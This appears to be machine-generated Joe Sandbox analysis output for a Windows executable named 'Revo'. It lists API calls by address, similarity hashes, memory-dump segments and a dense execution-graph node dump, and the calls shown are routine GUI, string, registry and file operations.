                                                                                                                                                                            • Instruction ID: 026d517b253a5d6ccbe57f845948a58d3e37c3b70aabf831ebb2f23b3e620644
                                                                                                                                                                            • Opcode Fuzzy Hash: 4099efde17faabea8ca23ed937e5d9f442c3975f0fb2967c08604eca1be790f2
                                                                                                                                                                            • Instruction Fuzzy Hash: 14312370600315BBD2207F659D49F6B3A6CDF41759F12403AFA02F62D3EA7C982986BD
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 004046A5
• GetSysColor.USER32(00000000), ref: 004046E3
• SetTextColor.GDI32(?,00000000), ref: 004046EF
• SetBkMode.GDI32(?,?), ref: 004046FB
• GetSysColor.USER32(?), ref: 0040470E
• SetBkColor.GDI32(?,?), ref: 0040471E
• DeleteObject.GDI32(?), ref: 00404738
• CreateBrushIndirect.GDI32(?), ref: 00404742
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
• Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
• Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
• Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
• GetMessagePos.USER32 ref: 00404FFF
• ScreenToClient.USER32(?,?), ref: 00405019
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
• Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
• Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
• Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
APIs
• GetDC.USER32(?), ref: 00401E76
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
• MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
• ReleaseDC.USER32(?,00000000), ref: 00401EA9
• CreateFontIndirectW.GDI32(0041E5F8), ref: 00401EF8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Tahoma
• API String ID: 3808545654-3580928618
• Opcode ID: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
• Instruction ID: 75d1d1a794b0a88cdf1cba10915d0c929158808af8533b27f0e618500a238d04
• Opcode Fuzzy Hash: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
• Instruction Fuzzy Hash: 5C01D475900260FFEB005BB5AD0DBDD7FB0AB29300F50C83AF542B61E2CAB904448B2D
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
• CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
• CharNextW.USER32(?,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
• CharPrevW.USER32(?,?,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
• Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
• Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
• Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
• Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
APIs
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1354259210-0
                                                                                                                                                                            • Opcode ID: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                                                                                                                                            • Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
                                                                                                                                                                            • Opcode Fuzzy Hash: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                                                                                                                                            • Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
APIs
• IsWindowVisible.USER32(?), ref: 004056CA
• CallWindowProcW.USER32(?,?,?,?), ref: 0040571B
  • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
• Instruction ID: 4a72d77d5ba7db911775b8fd6e8698557fa8fe3088d7b3c11d294ca78c68b4d0
• Opcode Fuzzy Hash: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
• Instruction Fuzzy Hash: 6801B131100708EFDB204F90DDC0A9B3665FB80750F504036F605761D1D77A8C91EE2D

APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
• CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
• lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
• Instruction ID: 5f3436636367d0d5bc92f6b0e419d408aad35ecbe6557c54d873c5627a92c34c
• Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
• Instruction Fuzzy Hash: E4F0BB35604414FFC702DFA5DD00D9EBBA8EF46350B2640B9F841FB211D674DE129B99

Execution Graph

Execution Coverage: 10.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.3%
Total number of Nodes: 1498
Total number of Limit Nodes: 32
fd1e88 24310->24311 24450 fd192e 24310->24450 24311->24267 24314 fd392a 24313->24314 24315 fd3926 24313->24315 24316 fd3949 24314->24316 24317 fd3957 24314->24317 24315->24267 24318 fd3989 24316->24318 24616 fd30fc 86 API calls 3 library calls 24316->24616 24617 fd2692 98 API calls 3 library calls 24317->24617 24318->24267 24321 fd3955 24321->24318 24618 fd1ef8 74 API calls 24321->24618 24324 fd83ca __EH_prolog 24323->24324 24325 fd8403 24324->24325 24356 fd8407 24324->24356 24642 fe80d0 101 API calls 24324->24642 24326 fd842c 24325->24326 24329 fd84b5 24325->24329 24325->24356 24328 fd844e 24326->24328 24326->24356 24643 fd79a7 153 API calls 24326->24643 24328->24356 24644 fe80d0 101 API calls 24328->24644 24329->24356 24619 fd5c80 24329->24619 24333 fd8540 24333->24356 24627 fd80b1 24333->24627 24335 fd86a7 24337 fda1b1 8 API calls 24335->24337 24338 fd8712 24335->24338 24337->24338 24631 fd7be2 24338->24631 24340 fdc634 80 API calls 24344 fd876d _memcmp 24340->24344 24341 fd889f 24342 fd8972 24341->24342 24349 fd88ee 24341->24349 24347 fd89cd 24342->24347 24360 fd897d 24342->24360 24343 fd8898 24647 fd6bf5 74 API calls 24343->24647 24344->24340 24344->24341 24344->24343 24344->24356 24645 fd807d 83 API calls 24344->24645 24646 fd6bf5 74 API calls 24344->24646 24358 fd895f 24347->24358 24650 fd7f5f 96 API calls 24347->24650 24348 fd89cb 24350 fd946e 79 API calls 24348->24350 24351 fd9e6b 4 API calls 24349->24351 24349->24358 24350->24356 24357 fd8926 24351->24357 24353 fd946e 79 API calls 24353->24356 24354 fd8aa3 24361 fda728 8 API calls 24354->24361 24355 fd8a38 24355->24354 24359 fd9745 GetFileType 24355->24359 24395 fd8ff0 24355->24395 24356->24267 24357->24358 24648 fd919c 96 API calls 24357->24648 24358->24348 24358->24355 24362 fd8a7b 24359->24362 24360->24348 24649 fd7d9b 100 API calls pre_c_initialization 24360->24649 24364 fd8af2 24361->24364 24362->24354 24651 fd6bf5 74 API calls 24362->24651 24366 fda728 8 API calls 24364->24366 24367 fd8b08 
24366->24367 24371 fd8bcb 24367->24371 24653 fd98d5 SetFilePointer GetLastError SetEndOfFile 24367->24653 24369 fd8a91 24652 fd6e9b 75 API calls 24369->24652 24372 fd8d2c 24371->24372 24373 fd8c26 24371->24373 24375 fd8d3e 24372->24375 24376 fd8d52 24372->24376 24393 fd8c56 24372->24393 24374 fd8c98 24373->24374 24378 fd8c36 24373->24378 24377 fd80b1 CharUpperW 24374->24377 24381 fd910b 123 API calls 24375->24381 24382 fe2842 75 API calls 24376->24382 24379 fd8cb3 24377->24379 24380 fd8c7c 24378->24380 24385 fd8c44 24378->24385 24388 fd8cdc 24379->24388 24389 fd8ce3 24379->24389 24379->24393 24380->24393 24655 fd774c 108 API calls 24380->24655 24381->24393 24384 fd8d6b 24382->24384 24386 fe24d9 123 API calls 24384->24386 24654 fd6bf5 74 API calls 24385->24654 24386->24393 24656 fd74dd 84 API calls pre_c_initialization 24388->24656 24657 fd9049 94 API calls __EH_prolog 24389->24657 24398 fd8e7a 24393->24398 24658 fd6bf5 74 API calls 24393->24658 24395->24353 24396 fd8f33 24637 fd9a7e 24396->24637 24397 fda12f 4 API calls 24399 fd8fe0 24397->24399 24398->24395 24398->24396 24405 fd8f85 24398->24405 24659 fd9bd6 SetEndOfFile 24398->24659 24399->24395 24660 fd6bf5 74 API calls 24399->24660 24402 fd8f7a 24403 fd94da 75 API calls 24402->24403 24403->24405 24405->24395 24405->24397 24407 fd163f 24406->24407 24676 fdc56d 84 API calls 24407->24676 24410->24261 24412 fdc4d4 __EH_prolog 24411->24412 24413 fed82c new 8 API calls 24412->24413 24414 fdc517 24413->24414 24415 fed82c new 8 API calls 24414->24415 24416 fdc53b 24415->24416 24416->24278 24417->24285 24423 fd16c0 24418->24423 24420 fd6ef3 24420->24295 24421->24300 24422->24301 24424 fd16d6 24423->24424 24435 fd172e __vswprintf_c_l 24423->24435 24425 fd16ff 24424->24425 24436 fd6cce 74 API calls __vswprintf_c_l 24424->24436 24427 fd1755 24425->24427 24432 fd171b ___std_exception_copy 24425->24432 24429 ff2b5e 22 API calls 24427->24429 24428 fd16f5 24437 fd6d3a 75 API calls 24428->24437 24431 fd175c 24429->24431 
24431->24435 24439 fd6d3a 75 API calls 24431->24439 24432->24435 24438 fd6d3a 75 API calls 24432->24438 24435->24420 24436->24428 24437->24425 24438->24435 24439->24435 24441 fe08a8 __vswprintf_c_l 24440->24441 24441->24305 24443 fecb0b 24442->24443 24444 fdda42 53 API calls 24443->24444 24445 fecb2e 24444->24445 24446 fd3e41 _swprintf 51 API calls 24445->24446 24447 fecb40 24446->24447 24448 fec190 16 API calls 24447->24448 24449 fe0fd6 24448->24449 24449->24259 24451 fd1943 24450->24451 24453 fd193f 24450->24453 24454 fd1884 24451->24454 24453->24311 24455 fd1892 24454->24455 24457 fd18c7 24454->24457 24456 fd391a 98 API calls 24455->24456 24460 fd18aa 24456->24460 24462 fd3d4f 24457->24462 24460->24453 24464 fd3d58 24462->24464 24463 fd391a 98 API calls 24463->24464 24464->24463 24466 fd18e3 24464->24466 24479 fe02e8 24464->24479 24466->24460 24467 fd1d61 24466->24467 24468 fd1d6b __EH_prolog 24467->24468 24487 fd399d 24468->24487 24470 fd1d95 24471 fd1e1c 24470->24471 24472 fd16c0 76 API calls 24470->24472 24471->24460 24473 fd1dac 24472->24473 24515 fd1837 76 API calls 24473->24515 24475 fd1dc4 24477 fd1dd0 24475->24477 24516 fe0fde MultiByteToWideChar 24475->24516 24517 fd1837 76 API calls 24477->24517 24480 fe02ef 24479->24480 24481 fe030a 24480->24481 24485 fd6cc9 RaiseException FindHandler 24480->24485 24482 fe031b SetThreadExecutionState 24481->24482 24486 fd6cc9 RaiseException FindHandler 24481->24486 24482->24464 24485->24481 24486->24482 24488 fd39a7 __EH_prolog 24487->24488 24489 fd39bd 24488->24489 24490 fd39d9 24488->24490 24552 fd134c 74 API calls 24489->24552 24491 fd3c22 24490->24491 24495 fd3a05 24490->24495 24571 fd134c 74 API calls 24491->24571 24494 fd39c8 24494->24470 24495->24494 24518 fe2842 24495->24518 24497 fd3a86 24498 fd3b11 24497->24498 24514 fd3a7d 24497->24514 24555 fdc634 24497->24555 24531 fda728 24498->24531 24499 fd3a82 24499->24497 24554 fd1ede 76 API calls 24499->24554 24501 fd3a54 24501->24497 24501->24499 24502 fd3a72 
24501->24502 24553 fd134c 74 API calls 24502->24553 24507 fd3b24 24508 fd3b9e 24507->24508 24509 fd3ba8 24507->24509 24535 fd910b 24508->24535 24561 fe24d9 24509->24561 24512 fd3ba6 24512->24514 24570 fd6bf5 74 API calls 24512->24570 24546 fe16cb 24514->24546 24515->24475 24516->24477 24517->24471 24519 fe2851 24518->24519 24521 fe285b 24518->24521 24572 fd6d3a 75 API calls 24519->24572 24522 fe289b 24521->24522 24523 fe28a0 ___std_exception_copy 24521->24523 24530 fe28f9 ___scrt_fastfail 24521->24530 24574 ff0b4a RaiseException 24522->24574 24524 fe29b0 24523->24524 24526 fe28d5 24523->24526 24523->24530 24575 ff0b4a RaiseException 24524->24575 24573 fe2763 75 API calls 3 library calls 24526->24573 24528 fe29d3 24530->24501 24532 fda735 24531->24532 24534 fda73f 24531->24534 24533 fed82c new 8 API calls 24532->24533 24533->24534 24534->24507 24536 fd9115 __EH_prolog 24535->24536 24576 fd7c3c 24536->24576 24539 fd6ed7 76 API calls 24540 fd9127 24539->24540 24579 fdc70f 24540->24579 24542 fd9181 24542->24512 24544 fdc70f 116 API calls 24545 fd9139 24544->24545 24545->24542 24545->24544 24588 fdc8c7 97 API calls __vswprintf_c_l 24545->24588 24548 fe16d5 24546->24548 24547 fe16ee 24589 fe03c7 84 API calls 24547->24589 24548->24547 24551 fe1702 24548->24551 24550 fe16f5 24550->24551 24552->24494 24553->24514 24554->24497 24556 fdc655 24555->24556 24557 fdc667 24555->24557 24590 fd607d 24556->24590 24559 fd607d 80 API calls 24557->24559 24560 fdc65f 24559->24560 24560->24498 24562 fe24e2 24561->24562 24564 fe250b 24561->24564 24563 fe24ff 24562->24563 24566 fe2501 24562->24566 24568 fe24f7 24562->24568 24563->24512 24564->24563 24615 fe4b06 123 API calls 2 library calls 24564->24615 24614 fe581e 116 API calls 24566->24614 24601 fe626d 24568->24601 24570->24514 24571->24494 24572->24521 24573->24530 24574->24524 24575->24528 24577 fda995 GetVersionExW 24576->24577 24578 fd7c41 24577->24578 24578->24539 24582 fdc724 __vswprintf_c_l 24579->24582 24580 fdc86e 24581 fdc896 
24580->24581 24583 fdc6ae 6 API calls 24580->24583 24584 fe02e8 SetThreadExecutionState RaiseException 24581->24584 24582->24580 24585 fdc865 24582->24585 24586 fe80d0 101 API calls 24582->24586 24587 fda810 89 API calls 24582->24587 24583->24581 24584->24585 24585->24545 24586->24582 24587->24582 24588->24545 24589->24550 24591 fd609c 24590->24591 24600 fd6118 24590->24600 24592 fde7aa 80 API calls 24591->24592 24591->24600 24593 fd60c4 24592->24593 24594 fe11fa WideCharToMultiByte 24593->24594 24595 fd60d7 24594->24595 24596 fd60dc 24595->24596 24597 fd611a 24595->24597 24599 fd644c 80 API calls 24596->24599 24596->24600 24598 fd6165 80 API calls 24597->24598 24598->24600 24599->24600 24600->24560 24602 fe2a7f 75 API calls 24601->24602 24608 fe627e ___BuildCatchObject __vswprintf_c_l 24602->24608 24603 fdc70f 116 API calls 24603->24608 24604 fe6650 24605 fe47da 98 API calls 24604->24605 24606 fe6660 __vswprintf_c_l 24605->24606 24606->24563 24607 fe0697 79 API calls 24607->24608 24608->24603 24608->24604 24608->24607 24609 fe33d3 116 API calls 24608->24609 24610 fe66a2 116 API calls 24608->24610 24611 fe045d 86 API calls 24608->24611 24612 fe6cdb 123 API calls 24608->24612 24613 fe2e2c 98 API calls 24608->24613 24609->24608 24610->24608 24611->24608 24612->24608 24613->24608 24614->24563 24615->24563 24616->24321 24617->24321 24618->24318 24620 fd5c8e 24619->24620 24661 fd5bad 24620->24661 24622 fd5cc1 24623 fd5cf9 24622->24623 24625 fd5d02 24622->24625 24666 fdaa05 CompareStringW CharUpperW CompareStringW 24622->24666 24623->24333 24625->24623 24667 fdfa84 CompareStringW 24625->24667 24628 fd80cf 24627->24628 24673 fe1401 CharUpperW 24628->24673 24630 fd8179 24630->24335 24632 fd7bf1 24631->24632 24633 fd7c31 24632->24633 24674 fd6e7d 74 API calls 24632->24674 24633->24344 24635 fd7c29 24675 fd134c 74 API calls 24635->24675 24638 fd9a8f 24637->24638 24641 fd9a9e 24637->24641 24639 fd9a95 FlushFileBuffers 24638->24639 24638->24641 24639->24641 24640 fd9b17 
SetFileTime 24640->24402 24641->24640 24642->24325 24643->24328 24644->24356 24645->24344 24646->24344 24647->24341 24648->24358 24649->24348 24650->24358 24651->24369 24652->24354 24653->24371 24654->24393 24655->24393 24656->24393 24657->24393 24658->24398 24659->24396 24660->24395 24668 fd5aaa 24661->24668 24664 fd5bce 24664->24622 24665 fd5aaa 3 API calls 24665->24664 24666->24622 24667->24623 24671 fd5ab4 24668->24671 24669 fd5b9c 24669->24664 24669->24665 24671->24669 24672 fdaa05 CompareStringW CharUpperW CompareStringW 24671->24672 24672->24671 24673->24630 24674->24635 24675->24633 24678 fda2e9 24677->24678 24679 fda379 FindNextFileW 24678->24679 24680 fda307 FindFirstFileW 24678->24680 24682 fda398 24679->24682 24683 fda384 GetLastError 24679->24683 24681 fda320 24680->24681 24688 fda35d 24680->24688 24684 fdb32c 2 API calls 24681->24684 24682->24688 24683->24682 24685 fda339 24684->24685 24686 fda33d FindFirstFileW 24685->24686 24687 fda352 GetLastError 24685->24687 24686->24687 24686->24688 24687->24688 24688->24272 24689->24156 24690->24162 24691->24162 24692->24165 24693->24172 24695 fd9c0e 76 API calls 24694->24695 24696 fd1eaa 24695->24696 24697 fd1eae 24696->24697 24698 fd1973 98 API calls 24696->24698 24697->24181 24697->24182 24699 fd1ebb 24698->24699 24699->24697 24701 fd134c 74 API calls 24699->24701 24701->24697 24815 fe93cd GdipDisposeImage GdipFree pre_c_initialization 24756 fee1ca 28 API calls 2 library calls 24817 fe9fc9 78 API calls 24757 ff91c2 71 API calls _free 24758 ff25c0 5 API calls 2 library calls 22868 fed7bf 22869 fed7c9 22868->22869 22870 fed53a ___delayLoadHelper2@8 19 API calls 22869->22870 22871 fed7d6 22870->22871 24720 fd94b8 79 API calls 24818 feafb9 93 API calls _swprintf 24760 fee1b6 20 API calls 24819 ff93b7 31 API calls 2 library calls 24761 ffa139 27 API calls ___delayLoadHelper2@8 24723 fea0b0 97 API calls 24725 fe6cac 116 API calls 24791 fec2a7 70 API calls 23106 fed1a4 19 API calls ___delayLoadHelper2@8 24727 
ffaca1 GetProcessHeap 24728 fe589e 123 API calls __vswprintf_c_l 24793 fd169e 84 API calls 23209 fee091 23210 fee09d ___DestructExceptionObject 23209->23210 23235 fedba6 23210->23235 23212 fee0a4 23214 fee0cd 23212->23214 23315 fee4f5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23212->23315 23219 fee10c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23214->23219 23246 ff77c5 23214->23246 23218 fee0ec ___DestructExceptionObject 23226 fee16c 23219->23226 23316 ff67f9 38 API calls 3 library calls 23219->23316 23254 fee610 23226->23254 23230 fee198 23232 fee1a1 23230->23232 23317 ff6c00 28 API calls _abort 23230->23317 23318 fedd1d 13 API calls 2 library calls 23232->23318 23236 fedbaf 23235->23236 23319 fee34b IsProcessorFeaturePresent 23236->23319 23238 fedbbb 23320 ff15e6 23238->23320 23240 fedbc0 23241 fedbc4 23240->23241 23329 ff7652 23240->23329 23241->23212 23244 fedbdb 23244->23212 23248 ff77dc 23246->23248 23247 fee203 ___delayLoadHelper2@8 5 API calls 23249 fee0e6 23247->23249 23248->23247 23249->23218 23250 ff7769 23249->23250 23251 ff7798 23250->23251 23252 fee203 ___delayLoadHelper2@8 5 API calls 23251->23252 23253 ff77c1 23252->23253 23253->23219 23379 fee920 23254->23379 23257 fee172 23258 ff7716 23257->23258 23381 ffa7b3 23258->23381 23260 ff771f 23261 fee17b 23260->23261 23385 ffab3e 38 API calls 23260->23385 23263 fecbb8 23261->23263 23506 fdfd49 23263->23506 23267 fecbd7 23555 fe9aa0 23267->23555 23269 fecbe0 23559 fe1017 GetCPInfo 23269->23559 23271 fecbea ___scrt_fastfail 23272 fecbfd GetCommandLineW 23271->23272 23273 fecc0c 23272->23273 23274 fecc8a GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23272->23274 23562 feb356 23273->23562 23275 fd3e41 _swprintf 51 API calls 23274->23275 23277 feccf3 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23275->23277 23573 fea4f8 LoadBitmapW 23277->23573 23280 fecc1a OpenFileMappingW 23284 fecc7a 
